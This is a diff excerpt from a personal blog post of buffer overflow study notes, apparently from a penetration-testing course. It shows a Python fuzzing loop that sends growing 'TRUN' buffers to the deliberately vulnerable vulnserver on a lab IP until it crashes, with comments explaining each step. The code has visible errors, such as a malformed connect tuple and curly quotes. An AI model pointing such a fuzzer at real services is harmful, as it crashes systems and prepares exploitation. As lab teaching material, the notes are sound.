cpardue/cpardue.github.io/_posts/2021-04-01-TCM-PEH-Manual-Buffer-Overflow-Notes.md

 buffer = A * 100
 while True:
     try:
-        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # create socket connection
-        s.connect(('192.168.x.x,9999'))
+        s.connect(('192.168.x.x,9999'))  # point the socket connection to vulnserver
-        s.send(('TRUN /.:/ ' + buffer)) // Added the .: just because we saw that it runs when we send TRUN before the chars begin.
+        s.send(('TRUN /.:/ ' + buffer)) # Added the .: just because we saw that it runs when we send TRUN before the chars begin.
         s.close()
         sleep(1)
-        buffer = buffer + “A”*100 // If 100 wasn't enough, let's grow exponentially
+        buffer = buffer + “A”*100 # If 100 wasn't enough, let's grow exponentially
     except:
-        print “Fuzzing crashed at %s bytes” % str(len(buffer)) // (len(var)) will run funct Length on variable Buffer and should tell us the position that broke things.
+        print “Fuzzing crashed at %s bytes” % str(len(buffer)) # (len(var)) will run funct Length on variable Buffer and should tell us the position that broke things.
         sys.exit()
 {% endhighlight %}</p>
 <hr>